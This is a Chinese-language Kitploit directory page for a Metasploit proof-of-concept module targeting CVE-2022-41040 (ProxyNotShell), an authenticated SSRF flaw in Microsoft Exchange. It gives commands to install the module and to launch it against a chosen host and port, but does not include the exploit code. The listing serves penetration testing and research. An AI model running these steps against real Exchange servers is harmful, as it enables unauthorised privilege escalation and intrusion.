Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-41040-metasploit-ProxyNotShell — 关于 CVE-2022-41040 的 metasploit 脚本(POC)。Microsoft Exchange 容易受到服务器端请求伪造(SSRF)攻击。经过身份验证的攻击者可以利用该漏洞提升权限。 | Kitploit
工具/GitHubGitHub/taroballzchen/cve-2022-41040-metasploit-proxynotshell
权限提升漏洞利用框架漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubtaroballzchen/cve-2022-41040-metasploit-proxynotshell

CVE-2022-41040-metasploit-ProxyNotShell

关于 CVE-2022-41040 的 metasploit 脚本(POC)。Microsoft Exchange 容易受到服务器端请求伪造(SSRF)攻击。经过身份验证的攻击者可以利用该漏洞提升权限。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
351423年前Kitploit 审核通过

CVE-2022-41040-metasploit-ProxyNotShell

关于 CVE-2022-41040 的 metasploit 脚本(POC)。Microsoft Exchange 存在服务器端请求伪造 (SSRF) 漏洞。经过身份验证的攻击者可以利用该漏洞提升权限。

准备 POC

root@kitploit:~
git clone https://github.com/TaroballzChen/CVE-2022-41040-metasploit-ProxyNotShell
cd CVE-2022-41040-metasploit-ProxyNotShell
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp microsoft_exchange_server_proxynotshell_ssrf.py ~/.msf4/modules/auxiliary/scanner/http/
chmod +x ~/.msf4/modules/auxiliary/scanner/http/microsoft_exchange_server_proxynotshell_ssrf.py
msfconsole

POC 用法

root@kitploit:~
set rhosts <vuln ip/host>
set rport <vuln port>
set rssl <default: true for https>
exploit

结果

poc

参考

  • https://www.kb.cert.org/vuls/id/915563
  • https://github.com/Vulnmachines/proxynotshell-checker
  • https://github.com/kljunowsky/CVE-2022-41040-POC
  • https://github.com/zan8in/afrog
  • https://github.com/Ph33rr/Exploit
下载工具